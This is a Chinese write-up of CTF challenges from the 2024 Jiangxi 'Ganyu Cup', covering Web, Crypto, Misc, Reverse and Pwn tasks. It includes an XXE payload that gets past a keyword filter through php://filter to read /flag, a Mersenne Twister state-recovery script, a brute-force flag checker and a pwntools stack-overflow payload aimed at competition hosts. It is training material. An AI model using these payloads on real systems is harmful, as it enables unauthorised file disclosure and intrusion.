2024年江西省“赣育杯”
2024年江西省“赣育杯”
2024年江西省“赣育杯”
Web
XXEXXE
<?php
$requestMethod = $_SERVER['REQUEST_METHOD'];
if($requestMethod == 'GET')
{
highlight_file("exploit.php");
exit();
}
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
$pattern = '/system[\s]*\"file/i';
if(preg_match($pattern, $xmlfile, $matches))
{
echo "xxe attack!!!";
exit();
}
$pattern2 = '/system[\s][" \']http/i';
if(preg_match($pattern2, $xmlfile, $matches2))
{
echo "xxe attack!!!";
exit();
}
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$code = $creds->code;
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$code);
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
思路:
xxe 攻击,但是把 http 和 file 给限制了,我们可以用 php://filter/convert.base64-encode/resource= 代替
exp:
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag">
]>
<root>
<code>&xxe;</code>
</root>
POST /exploit.php HTTP/1.1
Host: lzkxpjjgn5mjlnwp.ctfw.edu.sangfor.com.cn
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag">
]>
<root>
<code>&xxe;</code>
</root>
flag: SangFor{1voeXkm8dDOdqun1XTGOJqoEScWANm7F}
ReadFlag
审计源码发现了文件读取的操作参数是 filepath,尝试读取一下 /flag
在将后缀改成 .txt 即可
flag: Sangfor{1voeXkm8dDOSlOD6fwxCqfqB7PK7p9dP}
Crypto
Random-dlp
题目:
from random import *
from Crypto.Util.number import *
from gmpy2 import *
m = getrandbits(128)
flag = b'Sangfor{'+str(m).encode()+b'}'
big_bits = 992
x = getrandbits(32)
g = getrandbits(128)
def prime_number(big_bits):
number = getrandbits(big_bits)
number = number << 32
return next_prime(number)
def encrypt(g, x, p):
c = pow(g, x, p)
return c
p = getPrime(1024)
c = encrypt(g, x, p)
random_list1 = []
for i in range(10):
random_num1 = prime_number(big_bits)
random_num2 = prime_number(big_bits)
if i == 0:
Composite_number = random_num1 * random_num2
xor_prime = random_num1 ^ random_num2
random_list1.append(int(Composite_number))
random_list1.append(int(xor_prime))
else:
random_list1.append(int(random_num1))
random_list1.append(int(random_num2))
with open("output.txt", "w") as file:
file.write(str(p)+'\n')
file.write(str(g)+'\n')
file.write(str(c)+'\n')
file.write(str(random_list1)+'\n')
file.close()
output.txt
112058194267403833058793784138473465049586039244810248280280793401940923316599715786595035991265889000316749304600451614307673594552414762911424905443408316928558683295790689321410419835360057867452185892493159139274813682583491648268075441035789945779898197637242917492732756642374361434253293657015974947167
72230774446246819059070919230312241676
25898575351813467347756361561284365856705421373622434346365147734362427344172178270972033652584772191691310056428210998037260870268908688869482615394132059343346799243295903697237989551723127172024093549484340617394821948583242373385660445188161301691579247744638172728262876835921876558499186137269560040075
[5065809221397249795914513089532241535418102663843841350285885091820845924268184747393712704066864872817411880187138570682343431633457955483256879427452674941369291914713556216448497708811437937958937996112215942003348660775545739352648178349311820872326958487644664192024604484132973905940652831298817064882948766270012275390175132095666103160877771192023394295841216195145461506875974150379337178597242564194005887140459925415651634648423371399820338191237184941903484527013807399340034262032276649742513332545447037957047893203075544536859894680877963124739172891482242764504898102716242397187522857902572172473057, 99955815136124674505677363553135840917216692678315165208714645876521277179009541555218693763972124093311337930953461092973753294192953068017272222852126250530936095477001144686822657131226982048667251579944854755923118519999180605689190568796547900773861811522756528982895318342111571405051796393985533019048, 24951214876775885788278485993298935883105280564452502392337032636637599153012124690160176823135901955649626474466323234369704162147583514183518818815384469309391284619889012528426849184936602607540166882935206284737190356578402018505486046207333249505967711118113422090135636046960816359703893964837183554677, 63735822439027638347930926384555483566775155387066062360709500578052286318549227634413593840351428383897197597833504918858528748411325897547213118869672328907360484810484973252926179423832178715413704400407124674851846213298861297804209628195277281617154165428660917694234326798901580736084273629494088041757, 39071529319264144122517693361438598418880470756593322941690129027923208928268446297945914070664819020463177592618220307180768234539461404181356116373486691697198311358140764559571399701413631091258283152265699502835560122043191905595203107168361164250915665565281748691821103811409902599898557039984953524691, 71447538849043550489236227857620502323667624720765499661076080941388547943103542951502823264827924311333873468900404093613988519325446916133886201150020233801493132578384740407651818028400048585014643438328294855045626803470883414712315868779011867357769084114284389402511105272612356287304703404962312356807, 52962466634637139400501619527722752568585276657993411754600616127951975890696629030079415518920590190909513415890728071144013815559602709061123272832963802928228298724508888728237938259417153442373328203142342129694586771515529754194411662458621914934048774511032165142362830810695015013738664083438224540399, 57423981528398933873468616866900792482893922019979105011572877892417751205352097080731004319485399203572234331087446085999452726980079355595117463787238888889993634760389823276015459082858044966071192570090588745881046954363713811588873349697947288717515295176223227146462732526679884108786792837271953343027, 126296898271364372195125863493820447756429558293878363356053603450178809213995132535175169878945561611016764176806515428040939670666082527263109008291618582367947247888677161006826812339823083276551105316485498339383660306396912622589023982542132998630947876783303771149001078442003239315535876675172632101049, 25845546975706444877603132086246035139311932829494374543965549117020882777732609060189122035537025423140092885905051843827762861249614751342952827818838776820857403107233610530413520421746685890872474699216694711271124158533747388624387315693798154404030072847186608443192933759131724508896185542001200988449, 118706951707573501982866326833460945353754378156501788864595682938324238415021520780892183025636164654220878438544368873273718446789890035344241027582628498630520136834454861039969842961574108797045801403190746195905723134888537413330379180517552056604364843336428083702724432968389581028994227087676039758001, 54007942870523203750648677576360088173235763647042611768366234531798948744898565376957945490859515847702440452116678494899152086517202643437114871908968547294436011833144711754902646742763755835772646050233619456775022734003508586169672737048364098771706454903121381339209703128722105180195851543158164816147, 96427356818440044396627087376987983159487788992158542985967879129201068856116617904380333841107519375372335525244652671249996733545798021580060278195562263620946278389521409573321615348744087245762176207783134909744374509542809021757347466879759340468157596796616033865506691768021396092700892775108745101799, 30321168872043278758947601128253378298958215069978075146838080824578741653905489303748132572792849445954011690569670531957868364648947486452787981618492832586618552378613504205519872110016190298970836572300311308014145449952001849748622739766600161212391374562659112984704089558714900456926457861829159813859, 85564005786922708010551166312628730068214028501580252066217319213119887073220583550497453619470706846538030407146134433484688279733253768028305602147671906213103220555013879107382415173644401238205969155761854957644420420942313650568964789676237412735372252503305231829301609075701447370752668634213829836847, 81821457306126602753782929563133075532830555916190291996656122339509580565687045502854987986373511802600192076099348791046891517934499811681612183318759492269832054570458530077339307576071489015838751288902229874756943034010071472374284571750997437089979549180498840194239427209494174994448701600015893659977, 71422877034288814798644506091771387410572325005442998884336642574253137163748873699477966626482784195551997118451534794100999819484526840772857808181815640288870871281226110219253110638647328992627750855767328833544512943221815990169414062743216404352441287151429202312633055078298600376558777581148309553453, 2197736302132152470061618252374069525263268963674026536213181040880194648241527743076404079675296539609972005773433172045632187791261610752687985604070964345964115886818051370766631914234590261447585468239699558233728448363294340315293149944113368769127035446244458141653759348611622684543494577841718165989, 47222892817792074135374132563501284624324260464389067455160275034178836838556088781262986903493965486724640800999587517142299229798287590987239958833596013708605993151857435506843138591300183261149436904553015744156093610093432847969256685196409352757353272604341384583138181613092306741310699303108387799713, 151968654338874580276217291140873143147131724621912173266099771384070784026812759842979757326332025888640840579648115618684118264571185718796690667822245740151760549098253210782743372106528854979012567399960017074693852635154068626234867931543815344528805065733929789260465466043773893838701764213830282380367]
思路:
randomlist 一共有 992*20 bit 的数据,加上 g 是 128bit 足以恢复随机数,现在这里主要是要吧 `random_num1`和 `random_num2` 分解出来,利用 `random_list1`中 第一和第二数,进行剪枝就行,最后就是 预测随机数继续
学习:
剪枝相关 | 浮白载笔
CTF/randcrack | python随机数预测模块分析及改进方案
exp:
from extend_mt19937_predictor import ExtendMT19937Predictor
import sys
sys.setrecursionlimit(3000)
p = 112058194267403833058793784138473465049586039244810248280280793401940923316599715786595035991265889000316749304600451614307673594552414762911424905443408316928558683295790689321410419835360057867452185892493159139274813682583491648268075441035789945779898197637242917492732756642374361434253293657015974947167
g = 72230774446246819059070919230312241676
c = 25898575351813467347756361561284365856705421373622434346365147734362427344172178270972033652584772191691310056428210998037260870268908688869482615394132059343346799243295903697237989551723127172024093549484340617394821948583242373385660445188161301691579247744638172728262876835921876558499186137269560040075
random_list1 = [5065809221397249795914513089532241535418102663843841350285885091820845924268184747393712704066864872817411880187138570682343431633457955483256879427452674941369291914713556216448497708811437937958937996112215942003348660775545739352648178349311820872326958487644664192024604484132973905940652831298817064882948766270012275390175132095666103160877771192023394295841216195145461506875974150379337178597242564194005887140459925415651634648423371399820338191237184941903484527013807399340034262032276649742513332545447037957047893203075544536859894680877963124739172891482242764504898102716242397187522857902572172473057, 99955815136124674505677363553135840917216692678315165208714645876521277179009541555218693763972124093311337930953461092973753294192953068017272222852126250530936095477001144686822657131226982048667251579944854755923118519999180605689190568796547900773861811522756528982895318342111571405051796393985533019048, 24951214876775885788278485993298935883105280564452502392337032636637599153012124690160176823135901955649626474466323234369704162147583514183518818815384469309391284619889012528426849184936602607540166882935206284737190356578402018505486046207333249505967711118113422090135636046960816359703893964837183554677, 63735822439027638347930926384555483566775155387066062360709500578052286318549227634413593840351428383897197597833504918858528748411325897547213118869672328907360484810484973252926179423832178715413704400407124674851846213298861297804209628195277281617154165428660917694234326798901580736084273629494088041757, 39071529319264144122517693361438598418880470756593322941690129027923208928268446297945914070664819020463177592618220307180768234539461404181356116373486691697198311358140764559571399701413631091258283152265699502835560122043191905595203107168361164250915665565281748691821103811409902599898557039984953524691, 71447538849043550489236227857620502323667624720765499661076080941388547943103542951502823264827924311333873468900404093613988519325446916133886201150020233801493132578384740407651818028400048585014643438328294855045626803470883414712315868779011867357769084114284389402511105272612356287304703404962312356807, 52962466634637139400501619527722752568585276657993411754600616127951975890696629030079415518920590190909513415890728071144013815559602709061123272832963802928228298724508888728237938259417153442373328203142342129694586771515529754194411662458621914934048774511032165142362830810695015013738664083438224540399, 57423981528398933873468616866900792482893922019979105011572877892417751205352097080731004319485399203572234331087446085999452726980079355595117463787238888889993634760389823276015459082858044966071192570090588745881046954363713811588873349697947288717515295176223227146462732526679884108786792837271953343027, 126296898271364372195125863493820447756429558293878363356053603450178809213995132535175169878945561611016764176806515428040939670666082527263109008291618582367947247888677161006826812339823083276551105316485498339383660306396912622589023982542132998630947876783303771149001078442003239315535876675172632101049, 25845546975706444877603132086246035139311932829494374543965549117020882777732609060189122035537025423140092885905051843827762861249614751342952827818838776820857403107233610530413520421746685890872474699216694711271124158533747388624387315693798154404030072847186608443192933759131724508896185542001200988449, 118706951707573501982866326833460945353754378156501788864595682938324238415021520780892183025636164654220878438544368873273718446789890035344241027582628498630520136834454861039969842961574108797045801403190746195905723134888537413330379180517552056604364843336428083702724432968389581028994227087676039758001, 54007942870523203750648677576360088173235763647042611768366234531798948744898565376957945490859515847702440452116678494899152086517202643437114871908968547294436011833144711754902646742763755835772646050233619456775022734003508586169672737048364098771706454903121381339209703128722105180195851543158164816147, 96427356818440044396627087376987983159487788992158542985967879129201068856116617904380333841107519375372335525244652671249996733545798021580060278195562263620946278389521409573321615348744087245762176207783134909744374509542809021757347466879759340468157596796616033865506691768021396092700892775108745101799, 30321168872043278758947601128253378298958215069978075146838080824578741653905489303748132572792849445954011690569670531957868364648947486452787981618492832586618552378613504205519872110016190298970836572300311308014145449952001849748622739766600161212391374562659112984704089558714900456926457861829159813859, 85564005786922708010551166312628730068214028501580252066217319213119887073220583550497453619470706846538030407146134433484688279733253768028305602147671906213103220555013879107382415173644401238205969155761854957644420420942313650568964789676237412735372252503305231829301609075701447370752668634213829836847, 81821457306126602753782929563133075532830555916190291996656122339509580565687045502854987986373511802600192076099348791046891517934499811681612183318759492269832054570458530077339307576071489015838751288902229874756943034010071472374284571750997437089979549180498840194239427209494174994448701600015893659977, 71422877034288814798644506091771387410572325005442998884336642574253137163748873699477966626482784195551997118451534794100999819484526840772857808181815640288870871281226110219253110638647328992627750855767328833544512943221815990169414062743216404352441287151429202312633055078298600376558777581148309553453, 2197736302132152470061618252374069525263268963674026536213181040880194648241527743076404079675296539609972005773433172045632187791261610752687985604070964345964115886818051370766631914234590261447585468239699558233728448363294340315293149944113368769127035446244458141653759348611622684543494577841718165989, 47222892817792074135374132563501284624324260464389067455160275034178836838556088781262986903493965486724640800999587517142299229798287590987239958833596013708605993151857435506843138591300183261149436904553015744156093610093432847969256685196409352757353272604341384583138181613092306741310699303108387799713, 151968654338874580276217291140873143147131724621912173266099771384070784026812759842979757326332025888640840579648115618684118264571185718796690667822245740151760549098253210782743372106528854979012567399960017074693852635154068626234867931543815344528805065733929789260465466043773893838701764213830282380367]
n = random_list1[0]
gift = random_list1[1]
def findp(p, q):
if len(p) == 1024:
pp = int(p, 2)
if n % pp == 0:
print(f"a1 = {pp}")
print(f"a2 = {n // pp}")
else:
l = len(p)
pp = int(p, 2)
qq = int(q, 2)
if (pp ^ qq) % (2 ** l) == gift % (2**l) and pp * qq % (2**l) == n % (2**l):
findp('1' + p,'1' + q)
findp('0' + p,'1' + q)
findp('1' + p,'0' + q)
findp('0' + p,'0' + q)
findp('1','1')
a1 = 127954378905954473979599580543506133734470934402921187567126328044915399136783613004594347893231249786782113863929878799565038392492182148282608301947643527866047185811106214065159313666530775740342170598378474744062316856449855121227117986037506212272472581097517909639356259473022026193056598279705883312493
a2 = 39590745269613494512251071983478757508814280272882049594849029032543594900913069786771939178626302619505593605829896534613681707527396968070583148545044036306348014204000427687094161885558852315374684881011665955520787218713536145424007912730740353898075406161865607017294126568950247058934097741037059441349
tmp = [a1,a2] + random_list1[2:]
D = []
for i in range(len(tmp)):
D.append(tmp[i] >> 32)
predictor = ExtendMT19937Predictor()
predictor.setrandbits(g,128)
for i in range(len(D)):
predictor.setrandbits(D[i],992)
for i in range(len(D)):
predictor.backtrack_getrandbits(992)
predictor.backtrack_getrandbits(128)
predictor.backtrack_getrandbits(32)
m = predictor.backtrack_getrandbits(128)
flag = b'Sangfor{'+str(m).encode()+b'}'
print(flag)
flag: Sangfor{332419641733214815865048217860135168997}
Misc
AutoCAD
资料:fas文件格式研究 - AutoLISP/Visual LISP 编程技术 - AutoCAD论坛 - 明经CAD社区 - Powered by Discuz!
思路:
打开文件搜索一下 FAS4-FILE 关键字,可以找到一篇文章如上,这篇文章讲的很清楚了,这就是一个 .fas 文件 AutoCAD 生成的文件,然后可以发现,第二段和第三段的长度被修改了,下面就是这两段的长度
第一段长度 42 ,就是 $ $ 之间的长度 42 个字节
第二段的长度 179, 我现在选定的是 181 个,按照文章中的解释,正确的是 179
修改后利用 fas2lsp.exe 进行解密就行,最后会 flag_new.fas 这样的问题,就是解密好的
flag: SangFor{ilPuu8PCYPy4HcV1BX_JaNca8oj3M_jl}
Areurobot?(docker)
思路:
这题先 nc 连接
先回答第一个问题,判断这个图片是啥样子的(每个问题回答的时间只有 3 秒左右)
第二个问题,计算这个式子,这里没搓出脚本,尽量就一直换简单的就好了
第三个问题就行,扫描这个二维码,将结果发送过去就能出 flag (这里扫描二维码 Umi-OCR 建议用这个工具,利用用他的快捷键很快的)
最终结果
flag: SangFor{5qgjJc4rPLbNvyN_xB3NPuwUCg94hRMt}
Reverse
勒索病毒
思路:
这题分析了半天程序,发现 flag 就在 .enc 文件里面,两个都有
flag: Sangfor{dd704749-cf76-4f05-87e6-4a26c63e6517}
Nano
思路:
先 ida 64 打开,追踪主函数,分析一下加密过程,这个程序共分为 4 个流程如下:
1.这里先判断了 flag 的格式,这里可以确定 flag 格式为Sangfor{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
2.然后再检查 flag 内容每四个字节必须要在一个 char array[0x10][5] 的数组中,flag 每 4 个字符都是 0x10 字符表中的字符。
3.然后通过’hsallhhasslalalh’的判断形式,实际将flag的每一部分的数组内容进行分类
最后可以拼出flag为:
'Sangfor{'+i+j+'-'+k+'-'+l+'-'+m+'-'+n+v+x+'}'
其中i、j、k等分别对应a1、a2、a3数组中的字符。直接写脚本爆破即可。
a1 - a8 数据可以调试找到
exp:
from pwn import *
from itertools import product
from concurrent.futures import ThreadPoolExecutor
a1 = ['f9a0','fc75','6875']
a2 = ["943d","1ab3","1a50","1e40"]
a3 = ["d19b","bd69","b1d8","b013","dea6"]
a4 = ["d19b","bd69","b1d8","b013","dea6"]
a5 = ["943d","1ab3","1a50","1e40"]
a6 = ["943d","1ab3","1a50","1e40"]
a7 = ["c690","366f","c239","c31e"]
a8 = ["c690","366f","c239","c31e"]
# 定义所有可能的组合
combinations = list(product(a1, a2, a3, a4, a5, a6, a7, a8))
def test_flag(flag):
try:
p = process('./nanobot')
p.sendlineafter('ot~ :)\n', flag)
response = p.recv(0x100)
p.close()
if b'Well done~' in response:
return flag
except Exception as e:
print(f"Error testing flag {flag}: {e}")
return None
def main():
with ThreadPoolExecutor(max_workers=10) as executor:
futures = [executor.submit(test_flag, f'Sangfor{{{"-".join(comb)}}}') for comb in combinations]
for future in futures:
result = future.result()
if result:
print(result)
return
if __name__ == "__main__":
main()
from pwn import *
a1 = ['f9a0','fc75','6875']
a2 = ["943d","1ab3","1a50","1e40"]
a3 = ["d19b","bd69","b1d8","b013","dea6"]
a4 = ["d19b","bd69","b1d8","b013","dea6"]
a5 = ["943d","1ab3","1a50","1e40"]
a6 = ["943d","1ab3","1a50","1e40"]
a7 = ["c690","366f","c239","c31e"]
a8 = ["c690","366f","c239","c31e"]
for i in a1:
for j in a2:
for k in a3:
for l in a4:
for m in a5:
for n in a6:
for v in a7:
for x in a8:
flag = 'Sangfor{'+i+j+'-'+k+'-'+l+'-'+m+'-'+n+v+x+'}'
p = process('./nanobot')
p.sendlineafter('ot~ :)\n',flag)
if p.recv(0x100).find(b'Well done~')!=-1:
print(flag)
exit()
p.close()
flag: Sangfor{f9a01a50-bd69-d19b-1ab3-1e40c690c31e}
Pwn
OF
先 checksec 一下程序
最终 mian 函数,调用了下面这个函数,传过来一个参数,这里调用了 get() 函数。不好控制返回地址,但是这里直接使用传参来进行 check,那我们直接暴力覆盖栈上数值为这个1 6进制 就行
from pwn import *
p =remote("ctfx.edu.sangfor.com.cn", 41886)
payload=p32(0x1295c8e5)*30
p.sendline(payload)
p.interactive()
